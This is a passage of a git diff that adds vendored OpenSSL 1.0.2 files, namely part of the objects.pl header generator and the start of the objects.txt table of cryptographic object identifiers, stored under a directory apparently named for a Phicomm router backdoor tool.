+		{ die "$ARGV[1]:$o:There's already an object with name ",$Cname," on line ",$order{$nid{$Cname}},"\n"; }
+	$nid{$Cname} = $mynum;
+	$nidn{$mynum} = $Cname;
+	$order{$mynum} = $o;
+	$max_nid = $mynum if $mynum > $max_nid;
+	}
+close NUMIN;
+
+open (IN,"$ARGV[0]") || die "Can't open input file $ARGV[0]";
+$Cname="";
+$o=0;
+while (<IN>)
+	{
+	chop;
+	$o++;
+        if (/^!module\s+(.*)$/)
+		{
+		$module = $1."-";
+		$module =~ s/\./_/g;
+		$module =~ s/-/_/g;
+		}
+        if (/^!global$/)
+		{ $module = ""; }
+	if (/^!Cname\s+(.*)$/)
+		{ $Cname = $1; }
+	if (/^!Alias\s+(.+?)\s+(.*)$/)
+		{
+		$Cname = $module.$1;
+		$myoid = $2;
+		$myoid = &process_oid($myoid);
+		$Cname =~ s/-/_/g;
+		$ordern{$o} = $Cname;
+		$order{$Cname} = $o;
+		$obj{$Cname} = $myoid;
+		$_ = "";
+		$Cname = "";
+		}
+	s/!.*$//;
+	s/#.*$//;
+	next if /^\s*$/;
+	($myoid,$mysn,$myln) = split ':';
+	$mysn =~ s/^\s*//;
+	$mysn =~ s/\s*$//;
+	$myln =~ s/^\s*//;
+	$myln =~ s/\s*$//;
+	$myoid =~ s/^\s*//;
+	$myoid =~ s/\s*$//;
+	if ($myoid ne "")
+		{
+		$myoid = &process_oid($myoid);
+		}
+
+	if ($Cname eq "" && !($myln =~ / /))
+		{
+		$Cname = $myln;
+		$Cname =~ s/\./_/g;
+		$Cname =~ s/-/_/g;
+		if ($Cname ne "" && defined($ln{$module.$Cname}))
+			{ die "objects.txt:$o:There's already an object with long name ",$ln{$module.$Cname}," on line ",$order{$module.$Cname},"\n"; }
+		}
+	if ($Cname eq "")
+		{
+		$Cname = $mysn;
+		$Cname =~ s/-/_/g;
+		if ($Cname ne "" && defined($sn{$module.$Cname}))
+			{ die "objects.txt:$o:There's already an object with short name ",$sn{$module.$Cname}," on line ",$order{$module.$Cname},"\n"; }
+		}
+	if ($Cname eq "")
+		{
+		$Cname = $myln;
+		$Cname =~ s/-/_/g;
+		$Cname =~ s/\./_/g;
+		$Cname =~ s/ /_/g;
+		if ($Cname ne "" && defined($ln{$module.$Cname}))
+			{ die "objects.txt:$o:There's already an object with long name ",$ln{$module.$Cname}," on line ",$order{$module.$Cname},"\n"; }
+		}
+	$Cname =~ s/\./_/g;
+	$Cname =~ s/-/_/g;
+	$Cname = $module.$Cname;
+	$ordern{$o} = $Cname;
+	$order{$Cname} = $o;
+	$sn{$Cname} = $mysn;
+	$ln{$Cname} = $myln;
+	$obj{$Cname} = $myoid;
+	if (!defined($nid{$Cname}))
+		{
+		$max_nid++;
+		$nid{$Cname} = $max_nid;
+		$nidn{$max_nid} = $Cname;
+print STDERR "Added OID $Cname\n";
+		}
+	$Cname="";
+	}
+close IN;
+
+open (NUMOUT,">$ARGV[1]") || die "Can't open output file $ARGV[1]";
+foreach (sort { $a <=> $b } keys %nidn)
+	{
+	print NUMOUT $nidn{$_},"\t\t",$_,"\n";
+	}
+close NUMOUT;
+
+open (OUT,">$ARGV[2]") || die "Can't open output file $ARGV[2]";
+print OUT <<'EOF';
+/* crypto/objects/obj_mac.h */
+
+/* THIS FILE IS GENERATED FROM objects.txt by objects.pl via the
+ * following command:
+ * perl objects.pl objects.txt obj_mac.num obj_mac.h
+ */
+
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define SN_undef			"UNDEF"
+#define LN_undef			"undefined"
+#define NID_undef			0
+#define OBJ_undef			0L
+
+EOF
+
+foreach (sort { $a <=> $b } keys %ordern)
+	{
+	$Cname=$ordern{$_};
+	print OUT "#define SN_",$Cname,"\t\t\"",$sn{$Cname},"\"\n" if $sn{$Cname} ne "";
+	print OUT "#define LN_",$Cname,"\t\t\"",$ln{$Cname},"\"\n" if $ln{$Cname} ne "";
+	print OUT "#define NID_",$Cname,"\t\t",$nid{$Cname},"\n" if $nid{$Cname} ne "";
+	print OUT "#define OBJ_",$Cname,"\t\t",$obj{$Cname},"\n" if $obj{$Cname} ne "";
+	print OUT "\n";
+	}
+
+close OUT;
+
+sub process_oid
+	{
+	local($oid)=@_;
+	local(@a,$oid_pref);
+
+	@a = split(/\s+/,$myoid);
+	$pref_oid = "";
+	$pref_sep = "";
+	if (!($a[0] =~ /^[0-9]+$/))
+		{
+		$a[0] =~ s/-/_/g;
+		if (!defined($obj{$a[0]}))
+			{ die "$ARGV[0]:$o:Undefined identifier ",$a[0],"\n"; }
+		$pref_oid = "OBJ_" . $a[0];
+		$pref_sep = ",";
+		shift @a;
+		}
+	$oids = join('L,',@a) . "L";
+	if ($oids ne "L")
+		{
+		$oids = $pref_oid . $pref_sep . $oids;
+		}
+	else
+		{
+		$oids = $pref_oid;
+		}
+	return($oids);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.txt
new file mode 100644
index 0000000..b57aabb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objects.txt
@@ -0,0 +1,1350 @@
+# CCITT was renamed to ITU-T quite some time ago
+0			: ITU-T			: itu-t
+!Alias ccitt itu-t
+
+1			: ISO			: iso
+
+2			: JOINT-ISO-ITU-T	: joint-iso-itu-t
+!Alias joint-iso-ccitt joint-iso-itu-t
+
+iso 2			: member-body		: ISO Member Body
+
+iso 3			: identified-organization
+
+# HMAC OIDs
+identified-organization 6 1 5 5 8 1 1	: HMAC-MD5	: hmac-md5
+identified-organization 6 1 5 5 8 1 2	: HMAC-SHA1	: hmac-sha1
+
+identified-organization 132	: certicom-arc
+
+joint-iso-itu-t 23	: international-organizations	: International Organizations
+
+international-organizations 43	: wap
+wap 1			: wap-wsg
+
+joint-iso-itu-t 5 1 5	: selected-attribute-types	: Selected Attribute Types
+
+selected-attribute-types 55	: clearance
+
+member-body 840		: ISO-US		: ISO US Member Body
+ISO-US 10040		: X9-57			: X9.57
+X9-57 4			: X9cm			: X9.57 CM ?
+
+!Cname dsa
+X9cm 1			: DSA			: dsaEncryption
+X9cm 3			: DSA-SHA1		: dsaWithSHA1
+
+
+ISO-US 10045		: ansi-X9-62		: ANSI X9.62
+!module X9-62
+!Alias id-fieldType ansi-X9-62 1
+X9-62_id-fieldType 1		: prime-field
+X9-62_id-fieldType 2		: characteristic-two-field
+X9-62_characteristic-two-field 3 : id-characteristic-two-basis
+X9-62_id-characteristic-two-basis 1 : onBasis
+X9-62_id-characteristic-two-basis 2 : tpBasis
+X9-62_id-characteristic-two-basis 3 : ppBasis
+!Alias id-publicKeyType ansi-X9-62 2
+X9-62_id-publicKeyType 1	: id-ecPublicKey
+!Alias ellipticCurve ansi-X9-62 3
+!Alias c-TwoCurve X9-62_ellipticCurve 0
+X9-62_c-TwoCurve 1		: c2pnb163v1
+X9-62_c-TwoCurve 2		: c2pnb163v2
+X9-62_c-TwoCurve 3		: c2pnb163v3
+X9-62_c-TwoCurve 4		: c2pnb176v1
+X9-62_c-TwoCurve 5		: c2tnb191v1
+X9-62_c-TwoCurve 6		: c2tnb191v2
+X9-62_c-TwoCurve 7		: c2tnb191v3
+X9-62_c-TwoCurve 8		: c2onb191v4
+X9-62_c-TwoCurve 9		: c2onb191v5
+X9-62_c-TwoCurve 10		: c2pnb208w1
+X9-62_c-TwoCurve 11		: c2tnb239v1
+X9-62_c-TwoCurve 12		: c2tnb239v2
+X9-62_c-TwoCurve 13		: c2tnb239v3
+X9-62_c-TwoCurve 14		: c2onb239v4
+X9-62_c-TwoCurve 15		: c2onb239v5
+X9-62_c-TwoCurve 16		: c2pnb272w1
+X9-62_c-TwoCurve 17		: c2pnb304w1
+X9-62_c-TwoCurve 18		: c2tnb359v1
+X9-62_c-TwoCurve 19		: c2pnb368w1
+X9-62_c-TwoCurve 20		: c2tnb431r1
+!Alias primeCurve X9-62_ellipticCurve 1
+X9-62_primeCurve 1	 	: prime192v1
+X9-62_primeCurve 2	 	: prime192v2
+X9-62_primeCurve 3	 	: prime192v3
+X9-62_primeCurve 4	 	: prime239v1
+X9-62_primeCurve 5	 	: prime239v2
+X9-62_primeCurve 6	 	: prime239v3
+X9-62_primeCurve 7	 	: prime256v1
+!Alias id-ecSigType ansi-X9-62 4
+!global
+X9-62_id-ecSigType 1		: ecdsa-with-SHA1
+X9-62_id-ecSigType 2		: ecdsa-with-Recommended
+X9-62_id-ecSigType 3		: ecdsa-with-Specified
+ecdsa-with-Specified 1		: ecdsa-with-SHA224
+ecdsa-with-Specified 2		: ecdsa-with-SHA256
+ecdsa-with-Specified 3		: ecdsa-with-SHA384
+ecdsa-with-Specified 4		: ecdsa-with-SHA512
+
+# SECG curve OIDs from "SEC 2: Recommended Elliptic Curve Domain Parameters"
+# (http://www.secg.org/)
+!Alias secg_ellipticCurve certicom-arc 0
+# SECG prime curves OIDs
+secg-ellipticCurve 6		: secp112r1
+secg-ellipticCurve 7		: secp112r2
+secg-ellipticCurve 28		: secp128r1
+secg-ellipticCurve 29		: secp128r2
+secg-ellipticCurve 9		: secp160k1
+secg-ellipticCurve 8		: secp160r1
+secg-ellipticCurve 30		: secp160r2
+secg-ellipticCurve 31		: secp192k1
+# NOTE: the curve secp192r1 is the same as prime192v1 defined above
+#       and is therefore omitted
+secg-ellipticCurve 32		: secp224k1
+secg-ellipticCurve 33		: secp224r1
+secg-ellipticCurve 10		: secp256k1
+# NOTE: the curve secp256r1 is the same as prime256v1 defined above
+#       and is therefore omitted
+secg-ellipticCurve 34		: secp384r1
+secg-ellipticCurve 35		: secp521r1
+# SECG characteristic two curves OIDs
+secg-ellipticCurve 4		: sect113r1
+secg-ellipticCurve 5		: sect113r2
+secg-ellipticCurve 22		: sect131r1
+secg-ellipticCurve 23		: sect131r2
+secg-ellipticCurve 1		: sect163k1
+secg-ellipticCurve 2		: sect163r1
+secg-ellipticCurve 15		: sect163r2
+secg-ellipticCurve 24		: sect193r1
+secg-ellipticCurve 25		: sect193r2
+secg-ellipticCurve 26		: sect233k1
+secg-ellipticCurve 27		: sect233r1
+secg-ellipticCurve 3		: sect239k1
+secg-ellipticCurve 16		: sect283k1
+secg-ellipticCurve 17		: sect283r1
+secg-ellipticCurve 36		: sect409k1
+secg-ellipticCurve 37		: sect409r1
+secg-ellipticCurve 38		: sect571k1
+secg-ellipticCurve 39		: sect571r1
+
+# WAP/TLS curve OIDs (http://www.wapforum.org/)
+!Alias wap-wsg-idm-ecid wap-wsg 4
+wap-wsg-idm-ecid 1	: wap-wsg-idm-ecid-wtls1
+wap-wsg-idm-ecid 3	: wap-wsg-idm-ecid-wtls3
+wap-wsg-idm-ecid 4	: wap-wsg-idm-ecid-wtls4
+wap-wsg-idm-ecid 5	: wap-wsg-idm-ecid-wtls5
+wap-wsg-idm-ecid 6	: wap-wsg-idm-ecid-wtls6
+wap-wsg-idm-ecid 7	: wap-wsg-idm-ecid-wtls7
+wap-wsg-idm-ecid 8	: wap-wsg-idm-ecid-wtls8
+wap-wsg-idm-ecid 9	: wap-wsg-idm-ecid-wtls9
+wap-wsg-idm-ecid 10	: wap-wsg-idm-ecid-wtls10
+wap-wsg-idm-ecid 11	: wap-wsg-idm-ecid-wtls11
+wap-wsg-idm-ecid 12	: wap-wsg-idm-ecid-wtls12
+
+
+ISO-US 113533 7 66 10	: CAST5-CBC		: cast5-cbc
+			: CAST5-ECB		: cast5-ecb
+!Cname cast5-cfb64
+			: CAST5-CFB		: cast5-cfb
+!Cname cast5-ofb64
+			: CAST5-OFB		: cast5-ofb
+!Cname pbeWithMD5AndCast5-CBC
+ISO-US 113533 7 66 12	:			: pbeWithMD5AndCast5CBC
+
+# Macs for CMP and CRMF
+ISO-US 113533 7 66 13	: id-PasswordBasedMAC	: password based MAC
+ISO-US 113533 7 66 30	: id-DHBasedMac		: Diffie-Hellman based MAC
+
+ISO-US 113549		: rsadsi		: RSA Data Security, Inc.
+
+rsadsi 1		: pkcs			: RSA Data Security, Inc. PKCS
+
+pkcs 1			: pkcs1
+pkcs1 1			:			: rsaEncryption
+pkcs1 2			: RSA-MD2		: md2WithRSAEncryption
+pkcs1 3			: RSA-MD4		: md4WithRSAEncryption
+pkcs1 4			: RSA-MD5		: md5WithRSAEncryption
+pkcs1 5			: RSA-SHA1		: sha1WithRSAEncryption
+# According to PKCS #1 version 2.1
+pkcs1 7			: RSAES-OAEP		: rsaesOaep
+pkcs1 8			: MGF1			: mgf1
+pkcs1 9			: PSPECIFIED		: pSpecified
+pkcs1 10		: RSASSA-PSS		: rsassaPss
+
+pkcs1 11		: RSA-SHA256		: sha256WithRSAEncryption
+pkcs1 12		: RSA-SHA384		: sha384WithRSAEncryption
+pkcs1 13		: RSA-SHA512		: sha512WithRSAEncryption
+pkcs1 14		: RSA-SHA224		: sha224WithRSAEncryption
+
+pkcs 3			: pkcs3
+pkcs3 1			:			: dhKeyAgreement
+
+pkcs 5			: pkcs5
+pkcs5 1			: PBE-MD2-DES		: pbeWithMD2AndDES-CBC
+pkcs5 3			: PBE-MD5-DES		: pbeWithMD5AndDES-CBC
+pkcs5 4			: PBE-MD2-RC2-64	: pbeWithMD2AndRC2-CBC
+pkcs5 6			: PBE-MD5-RC2-64	: pbeWithMD5AndRC2-CBC
+pkcs5 10		: PBE-SHA1-DES		: pbeWithSHA1AndDES-CBC
+pkcs5 11		: PBE-SHA1-RC2-64	: pbeWithSHA1AndRC2-CBC
+!Cname id_pbkdf2
+pkcs5 12		:			: PBKDF2
+!Cname pbes2
+pkcs5 13		:			: PBES2
+!Cname pbmac1
+pkcs5 14		:			: PBMAC1
+
+pkcs 7			: pkcs7
+pkcs7 1			:			: pkcs7-data
+!Cname pkcs7-signed
+pkcs7 2			:			: pkcs7-signedData
+!Cname pkcs7-enveloped
+pkcs7 3			:			: pkcs7-envelopedData
+!Cname pkcs7-signedAndEnveloped
+pkcs7 4			:			: pkcs7-signedAndEnvelopedData
+!Cname pkcs7-digest
+pkcs7 5			:			: pkcs7-digestData
+!Cname pkcs7-encrypted
+pkcs7 6			:			: pkcs7-encryptedData
+
+pkcs 9			: pkcs9
+!module pkcs9
+pkcs9 1			: 			: emailAddress
+pkcs9 2			:			: unstructuredName
+pkcs9 3			:			: contentType
+pkcs9 4			:			: messageDigest
+pkcs9 5			:			: signingTime
+pkcs9 6			:			: countersignature
+pkcs9 7			:			: challengePassword
+pkcs9 8			:			: unstructuredAddress
+!Cname extCertAttributes
+pkcs9 9			:			: extendedCertificateAttributes
+!global
+
+!Cname ext-req
+pkcs9 14		: extReq		: Extension Request
+
+!Cname SMIMECapabilities
+pkcs9 15		: SMIME-CAPS		: S/MIME Capabilities
+
+# S/MIME
+!Cname SMIME
+pkcs9 16		: SMIME			: S/MIME
+SMIME 0			: id-smime-mod
+SMIME 1			: id-smime-ct
+SMIME 2			: id-smime-aa
+SMIME 3			: id-smime-alg
+SMIME 4			: id-smime-cd
+SMIME 5			: id-smime-spq
+SMIME 6			: id-smime-cti
+
+# S/MIME Modules
+id-smime-mod 1		: id-smime-mod-cms
+id-smime-mod 2		: id-smime-mod-ess
+id-smime-mod 3		: id-smime-mod-oid
+id-smime-mod 4		: id-smime-mod-msg-v3
+id-smime-mod 5		: id-smime-mod-ets-eSignature-88
+id-smime-mod 6		: id-smime-mod-ets-eSignature-97
+id-smime-mod 7		: id-smime-mod-ets-eSigPolicy-88
+id-smime-mod 8		: id-smime-mod-ets-eSigPolicy-97
+
+# S/MIME Content Types
+id-smime-ct 1		: id-smime-ct-receipt
+id-smime-ct 2		: id-smime-ct-authData
+id-smime-ct 3		: id-smime-ct-publishCert
+id-smime-ct 4		: id-smime-ct-TSTInfo
+id-smime-ct 5		: id-smime-ct-TDTInfo
+id-smime-ct 6		: id-smime-ct-contentInfo
+id-smime-ct 7		: id-smime-ct-DVCSRequestData
+id-smime-ct 8		: id-smime-ct-DVCSResponseData
+id-smime-ct 9		: id-smime-ct-compressedData
+id-smime-ct 27		: id-ct-asciiTextWithCRLF
+
+# S/MIME Attributes
+id-smime-aa 1		: id-smime-aa-receiptRequest
+id-smime-aa 2		: id-smime-aa-securityLabel
+id-smime-aa 3		: id-smime-aa-mlExpandHistory
+id-smime-aa 4		: id-smime-aa-contentHint
+id-smime-aa 5		: id-smime-aa-msgSigDigest
+# obsolete
+id-smime-aa 6		: id-smime-aa-encapContentType
+id-smime-aa 7		: id-smime-aa-contentIdentifier
+# obsolete
+id-smime-aa 8		: id-smime-aa-macValue
+id-smime-aa 9		: id-smime-aa-equivalentLabels
+id-smime-aa 10		: id-smime-aa-contentReference
+id-smime-aa 11		: id-smime-aa-encrypKeyPref
+id-smime-aa 12		: id-smime-aa-signingCertificate
+id-smime-aa 13		: id-smime-aa-smimeEncryptCerts
+id-smime-aa 14		: id-smime-aa-timeStampToken
+id-smime-aa 15		: id-smime-aa-ets-sigPolicyId
+id-smime-aa 16		: id-smime-aa-ets-commitmentType
+id-smime-aa 17		: id-smime-aa-ets-signerLocation
+id-smime-aa 18		: id-smime-aa-ets-signerAttr
+id-smime-aa 19		: id-smime-aa-ets-otherSigCert
+id-smime-aa 20		: id-smime-aa-ets-contentTimestamp
+id-smime-aa 21		: id-smime-aa-ets-CertificateRefs
+id-smime-aa 22		: id-smime-aa-ets-RevocationRefs
+id-smime-aa 23		: id-smime-aa-ets-certValues
+id-smime-aa 24		: id-smime-aa-ets-revocationValues
+id-smime-aa 25		: id-smime-aa-ets-escTimeStamp
+id-smime-aa 26		: id-smime-aa-ets-certCRLTimestamp
+id-smime-aa 27		: id-smime-aa-ets-archiveTimeStamp
+id-smime-aa 28		: id-smime-aa-signatureType
+id-smime-aa 29		: id-smime-aa-dvcs-dvc
+
+# S/MIME Algorithm Identifiers
+# obsolete
+id-smime-alg 1		: id-smime-alg-ESDHwith3DES
+# obsolete
+id-smime-alg 2		: id-smime-alg-ESDHwithRC2
+# obsolete
+id-smime-alg 3		: id-smime-alg-3DESwrap
+# obsolete
+id-smime-alg 4		: id-smime-alg-RC2wrap
+id-smime-alg 5		: id-smime-alg-ESDH
+id-smime-alg 6		: id-smime-alg-CMS3DESwrap
+id-smime-alg 7		: id-smime-alg-CMSRC2wrap
+id-smime-alg 9		: id-alg-PWRI-KEK
+
+# S/MIME Certificate Distribution
+id-smime-cd 1		: id-smime-cd-ldap
+
+# S/MIME Signature Policy Qualifier
+id-smime-spq 1		: id-smime-spq-ets-sqt-uri
+id-smime-spq 2		: id-smime-spq-ets-sqt-unotice
+
+# S/MIME Commitment Type Identifier
+id-smime-cti 1		: id-smime-cti-ets-proofOfOrigin
+id-smime-cti 2		: id-smime-cti-ets-proofOfReceipt
+id-smime-cti 3		: id-smime-cti-ets-proofOfDelivery
+id-smime-cti 4		: id-smime-cti-ets-proofOfSender
+id-smime-cti 5		: id-smime-cti-ets-proofOfApproval
+id-smime-cti 6		: id-smime-cti-ets-proofOfCreation
+
+pkcs9 20		:			: friendlyName
+pkcs9 21		:			: localKeyID
+!Cname ms-csp-name
+1 3 6 1 4 1 311 17 1	: CSPName		: Microsoft CSP Name
+1 3 6 1 4 1 311 17 2	: LocalKeySet		: Microsoft Local Key set
+!Alias certTypes pkcs9 22
+certTypes 1		:			: x509Certificate
+certTypes 2		:			: sdsiCertificate
+!Alias crlTypes pkcs9 23
+crlTypes 1		:			: x509Crl
+
+!Alias pkcs12 pkcs 12
+!Alias pkcs12-pbeids pkcs12 1
+
+!Cname pbe-WithSHA1And128BitRC4
+pkcs12-pbeids 1		: PBE-SHA1-RC4-128	: pbeWithSHA1And128BitRC4
+!Cname pbe-WithSHA1And40BitRC4
+pkcs12-pbeids 2		: PBE-SHA1-RC4-40	: pbeWithSHA1And40BitRC4
+!Cname pbe-WithSHA1And3_Key_TripleDES-CBC
+pkcs12-pbeids 3		: PBE-SHA1-3DES		: pbeWithSHA1And3-KeyTripleDES-CBC
+!Cname pbe-WithSHA1And2_Key_TripleDES-CBC
+pkcs12-pbeids 4		: PBE-SHA1-2DES		: pbeWithSHA1And2-KeyTripleDES-CBC
+!Cname pbe-WithSHA1And128BitRC2-CBC
+pkcs12-pbeids 5		: PBE-SHA1-RC2-128	: pbeWithSHA1And128BitRC2-CBC
+!Cname pbe-WithSHA1And40BitRC2-CBC
+pkcs12-pbeids 6		: PBE-SHA1-RC2-40	: pbeWithSHA1And40BitRC2-CBC
+
+!Alias pkcs12-Version1 pkcs12 10
+!Alias pkcs12-BagIds pkcs12-Version1 1
+pkcs12-BagIds 1		:			: keyBag
+pkcs12-BagIds 2		:			: pkcs8ShroudedKeyBag
+pkcs12-BagIds 3		:			: certBag
+pkcs12-BagIds 4		:			: crlBag
+pkcs12-BagIds 5		:			: secretBag
+pkcs12-BagIds 6		:			: safeContentsBag
+
+rsadsi 2 2		: MD2			: md2
+rsadsi 2 4		: MD4			: md4
+rsadsi 2 5		: MD5			: md5
+			: MD5-SHA1		: md5-sha1
+rsadsi 2 6		:			: hmacWithMD5
+rsadsi 2 7		:			: hmacWithSHA1
+
+# From RFC4231
+rsadsi 2 8		:			: hmacWithSHA224
+rsadsi 2 9		:			: hmacWithSHA256
+rsadsi 2 10		:			: hmacWithSHA384
+rsadsi 2 11		:			: hmacWithSHA512
+
+rsadsi 3 2		: RC2-CBC		: rc2-cbc
+			: RC2-ECB		: rc2-ecb
+!Cname rc2-cfb64
+			: RC2-CFB		: rc2-cfb
+!Cname rc2-ofb64
+			: RC2-OFB		: rc2-ofb
+			: RC2-40-CBC		: rc2-40-cbc
+			: RC2-64-CBC		: rc2-64-cbc
+rsadsi 3 4		: RC4			: rc4
+			: RC4-40		: rc4-40
+rsadsi 3 7		: DES-EDE3-CBC		: des-ede3-cbc
+rsadsi 3 8		: RC5-CBC		: rc5-cbc
+			: RC5-ECB		: rc5-ecb
+!Cname rc5-cfb64
+			: RC5-CFB		: rc5-cfb
+!Cname rc5-ofb64
+			: RC5-OFB		: rc5-ofb
+
+!Cname ms-ext-req
+1 3 6 1 4 1 311 2 1 14	: msExtReq		: Microsoft Extension Request
+!Cname ms-code-ind
+1 3 6 1 4 1 311 2 1 21	: msCodeInd		: Microsoft Individual Code Signing
+!Cname ms-code-com
+1 3 6 1 4 1 311 2 1 22	: msCodeCom		: Microsoft Commercial Code Signing
+!Cname ms-ctl-sign
+1 3 6 1 4 1 311 10 3 1	: msCTLSign		: Microsoft Trust List Signing
+!Cname ms-sgc
+1 3 6 1 4 1 311 10 3 3	: msSGC			: Microsoft Server Gated Crypto
+!Cname ms-efs
+1 3 6 1 4 1 311 10 3 4	: msEFS			: Microsoft Encrypted File System
+!Cname ms-smartcard-login
+1 3 6 1 4 1 311 20 2 2	: msSmartcardLogin	: Microsoft Smartcardlogin
+!Cname ms-upn
+1 3 6 1 4 1 311 20 2 3	: msUPN			: Microsoft Universal Principal Name
+
+1 3 6 1 4 1 188 7 1 1 2	: IDEA-CBC		: idea-cbc
+			: IDEA-ECB		: idea-ecb
+!Cname idea-cfb64
+			: IDEA-CFB		: idea-cfb
+!Cname idea-ofb64
+			: IDEA-OFB		: idea-ofb
+
+1 3 6 1 4 1 3029 1 2	: BF-CBC		: bf-cbc
+			: BF-ECB		: bf-ecb
+!Cname bf-cfb64
+			: BF-CFB		: bf-cfb
+!Cname bf-ofb64
+			: BF-OFB		: bf-ofb
+
+!Cname id-pkix
+1 3 6 1 5 5 7		: PKIX
+
+# PKIX Arcs
+id-pkix 0		: id-pkix-mod
+id-pkix 1		: id-pe
+id-pkix 2		: id-qt
+id-pkix 3		: id-kp
+id-pkix 4		: id-it
+id-pkix 5		: id-pkip
+id-pkix 6		: id-alg
+id-pkix 7		: id-cmc
+id-pkix 8		: id-on
+id-pkix 9		: id-pda
+id-pkix 10		: id-aca
+id-pkix 11		: id-qcs
+id-pkix 12		: id-cct
+id-pkix 21		: id-ppl
+id-pkix 48		: id-ad
+
+# PKIX Modules
+id-pkix-mod 1		: id-pkix1-explicit-88
+id-pkix-mod 2		: id-pkix1-implicit-88
+id-pkix-mod 3		: id-pkix1-explicit-93
+id-pkix-mod 4		: id-pkix1-implicit-93
+id-pkix-mod 5		: id-mod-crmf
+id-pkix-mod 6		: id-mod-cmc
+id-pkix-mod 7		: id-mod-kea-profile-88
+id-pkix-mod 8		: id-mod-kea-profile-93
+id-pkix-mod 9		: id-mod-cmp
+id-pkix-mod 10		: id-mod-qualified-cert-88
+id-pkix-mod 11		: id-mod-qualified-cert-93
+id-pkix-mod 12		: id-mod-attribute-cert
+id-pkix-mod 13		: id-mod-timestamp-protocol
+id-pkix-mod 14		: id-mod-ocsp
+id-pkix-mod 15		: id-mod-dvcs
+id-pkix-mod 16		: id-mod-cmp2000
+
+# PKIX Private Extensions
+!Cname info-access
+id-pe 1			: authorityInfoAccess	: Authority Information Access
+id-pe 2			: biometricInfo		: Biometric Info
+id-pe 3			: qcStatements
+id-pe 4			: ac-auditEntity
+id-pe 5			: ac-targeting
+id-pe 6			: aaControls
+id-pe 7			: sbgp-ipAddrBlock
+id-pe 8			: sbgp-autonomousSysNum
+id-pe 9			: sbgp-routerIdentifier
+id-pe 10		: ac-proxying
+!Cname sinfo-access
+id-pe 11		: subjectInfoAccess	: Subject Information Access
+id-pe 14		: proxyCertInfo		: Proxy Certificate Information
+
+# PKIX policyQualifiers for Internet policy qualifiers
+id-qt 1			: id-qt-cps		: Policy Qualifier CPS
+id-qt 2			: id-qt-unotice		: Policy Qualifier User Notice
+id-qt 3			: textNotice
+
+# PKIX key purpose identifiers
+!Cname server-auth
+id-kp 1			: serverAuth		: TLS Web Server Authentication
+!Cname client-auth
+id-kp 2			: clientAuth		: TLS Web Client Authentication
+!Cname code-sign
+id-kp 3			: codeSigning		: Code Signing
+!Cname email-protect
+id-kp 4			: emailProtection	: E-mail Protection
+id-kp 5			: ipsecEndSystem	: IPSec End System
+id-kp 6			: ipsecTunnel		: IPSec Tunnel
+id-kp 7			: ipsecUser		: IPSec User
+!Cname time-stamp
+id-kp 8			: timeStamping		: Time Stamping
+# From OCSP spec RFC2560
+!Cname OCSP-sign
+id-kp 9			: OCSPSigning		: OCSP Signing
+id-kp 10		: DVCS			: dvcs
+
+# CMP information types
+id-it 1			: id-it-caProtEncCert
+id-it 2			: id-it-signKeyPairTypes
+id-it 3			: id-it-encKeyPairTypes
+id-it 4			: id-it-preferredSymmAlg
+id-it 5			: id-it-caKeyUpdateInfo
+id-it 6			: id-it-currentCRL
+id-it 7			: id-it-unsupportedOIDs
+# obsolete
+id-it 8			: id-it-subscriptionRequest
+# obsolete
+id-it 9			: id-it-subscriptionResponse
+id-it 10		: id-it-keyPairParamReq
+id-it 11		: id-it-keyPairParamRep
+id-it 12		: id-it-revPassphrase
+id-it 13		: id-it-implicitConfirm
+id-it 14		: id-it-confirmWaitTime
+id-it 15		: id-it-origPKIMessage
+id-it 16		: id-it-suppLangTags
+
